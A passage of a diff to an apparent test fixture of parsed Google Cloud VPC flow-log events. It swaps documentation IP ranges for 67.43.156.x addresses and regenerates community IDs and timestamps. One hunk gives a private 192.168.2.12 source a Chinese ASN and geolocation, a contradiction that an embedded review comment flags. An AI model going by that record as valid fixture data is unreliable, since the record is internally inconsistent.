"2019-06-14T03:49:51.789258875Z", @@ -20155,18 +20155,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33550, "bytes": 59376, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 354 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5jhhJcbdl0291s4YJNbALw8uNfs=", + "community_id": "1:OALwlPDCqpn2fuHuxdc8nnkXpXM=", "bytes": 59376, "name": "default", "transport": "tcp", @@ -20188,7 +20188,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -20225,8 +20225,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869163900Z", - "original": "{\"insertId\":\"19im82tfdygzny\",\"jsonPayload\":{\"bytes_sent\":\"59376\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.496238286Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392292700Z", + "original": 
"{\"insertId\":\"19im82tfdygzny\",\"jsonPayload\":{\"bytes_sent\":\"59376\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33550},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108649Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.496238286Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.496238286Z", "end": "2019-06-14T03:49:59.565108649Z", @@ -20253,18 +20253,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33568, "bytes": 11214, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 120 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0bB9/qzQDttOyEP0YcGU/tYSYIQ=", + "community_id": "1:cHbiBB9WtpuQHZE4rFxmPUo/X2c=", "bytes": 11214, "name": "default", "transport": "tcp", @@ -20286,7 +20286,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -20323,8 +20323,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869166600Z", - "original": "{\"insertId\":\"19im82tfdygzoe\",\"jsonPayload\":{\"bytes_sent\":\"11214\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"120\",\"reporter\":\"DEST\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392298500Z", + "original": 
"{\"insertId\":\"19im82tfdygzoe\",\"jsonPayload\":{\"bytes_sent\":\"11214\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"120\",\"reporter\":\"DEST\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", "end": "2019-06-14T03:49:51.789035952Z", @@ -20351,18 +20351,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53106, "bytes": 1763338, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 598 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:7XAVLIIXucPcO5qM8uynmx+KF7s=", + "community_id": "1:/j39rLoEcamlJFwzEQGPMQYhVds=", "bytes": 1763338, "name": "default", "transport": "tcp", @@ -20384,7 +20384,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -20421,8 +20421,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869169400Z", - "original": "{\"insertId\":\"19im82tfdygznn\",\"jsonPayload\":{\"bytes_sent\":\"1763338\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":53106},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"598\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392304100Z", + "original": 
"{\"insertId\":\"19im82tfdygznn\",\"jsonPayload\":{\"bytes_sent\":\"1763338\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53106},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"598\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", "end": "2019-06-14T03:49:56.401543207Z", @@ -20443,10 +20443,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -20460,7 +20460,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:m09Xemo/1QRUmAThg0ZtnVcAeS8=", + "community_id": "1:KsEQeDpJJQzBIT7y9/jnqOdwYak=", "bytes": 67239, "name": "default", "transport": "tcp", 
@@ -20483,7 +20483,7 @@
 "related": {
 "ip": [
 "10.87.40.76",
- "198.51.100.248"
+ "67.43.156.14"
 ]
 },
 "gcp": {
@@ -20519,8 +20519,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869172Z", - "original": "{\"insertId\":\"19im82tfdygznl\",\"jsonPayload\":{\"bytes_sent\":\"67239\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392309600Z", + "original": 
"{\"insertId\":\"19im82tfdygznl\",\"jsonPayload\":{\"bytes_sent\":\"67239\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.146956782Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.146956782Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -20547,18 +20547,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 250327, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 247 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:A0Ohg3bqUresKEeBgZsLcFqEPRw=", + "community_id": "1:yyzV++A5KAdmyX88TOnGIQ8RV60=", "bytes": 250327, "name": "default", "transport": "tcp", @@ -20580,7 +20580,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -20617,8 +20617,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869174700Z", - "original": "{\"insertId\":\"19im82tfdygznv\",\"jsonPayload\":{\"bytes_sent\":\"250327\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392315200Z", + "original": 
"{\"insertId\":\"19im82tfdygznv\",\"jsonPayload\":{\"bytes_sent\":\"250327\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"247\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -20647,17 +20647,17 @@ "as": { "number": 4837 }, - "address": "192.0.2.12", + "address": "192.168.2.12", "port": 44128, "bytes": 0, - "ip": "192.0.2.12", + "ip": "192.168.2.12", "packets": 2 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RFaj1p+IkzecdvmvndE30lJ6hLs=", + "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -20671,7 +20671,7 @@ }, "related": { "ip": [ - "192.0.2.12", + "192.168.2.12", "10.73.186.17" ] }, 
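Review bot: Hunk 20647 swaps the documentation address 192.0.2.12 for the RFC 1918 address 192.168.2.12, yet the same flow keeps `"as": { "number": 4837 }` here and, in the payload hunk on the following line, a `src_location` of Binzhou/Shandong/chn for a source reaching port 22 on `infraops-docker-data`. A private source address with a foreign geolocation is self-contradictory, and the fixture stops representing the external-to-SSH case the original record encoded. If a public address was intended, it should come from the supported subset like the 67.43.156.x values used elsewhere in this diff, with `community_id` regenerated; if an internal source was intended, the `src_location` fields should be removed from the payload and the expected `as`/geo output re-checked, since a GeoIP lookup on a private address yields nothing. Any `source.geo` block for this record sits outside the hunk and should be re-verified as well.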
@@ -20693,8 +20693,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869177500Z", - "original": "{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392319600Z", + "original": 
"{\"insertId\":\"19im82tfdygzoc\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.12\",\"src_port\":44128},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:22.318564382Z\",\"packets_sent\":\"2\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:22.080963433Z", "end": "2019-06-14T03:45:22.318564382Z", @@ -20715,10 +20715,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33542, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -20732,7 +20732,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VPSH6E9LDgDYoGyFDhfUPu+Qrzg=", + "community_id": "1:o987u+FKYcH8IEcaicIttd58P5M=", "bytes": 266531, "name": "default", "transport": "tcp", @@ -20755,7 +20755,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -20791,8 +20791,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869180200Z", - "original": "{\"insertId\":\"19im82tfdygzof\",\"jsonPayload\":{\"bytes_sent\":\"266531\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"253\",\"reporter\":\"SRC\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392324300Z", + "original": 
"{\"insertId\":\"19im82tfdygzof\",\"jsonPayload\":{\"bytes_sent\":\"266531\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"253\",\"reporter\":\"SRC\",\"rtt_msec\":\"173\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150870105Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150870105Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -20819,18 +20819,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33560, "bytes": 65184, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 358 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:oxwQ2yjTxzJgTjy4DOGjIjbTugc=", + "community_id": "1:rl6P/BkNpx5wKW4KChF0WRwBicw=", "bytes": 65184, "name": "default", "transport": "tcp", @@ -20852,7 +20852,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -20889,8 +20889,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869182800Z", - "original": "{\"insertId\":\"19im82tfdygznr\",\"jsonPayload\":{\"bytes_sent\":\"65184\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392330Z", + "original": 
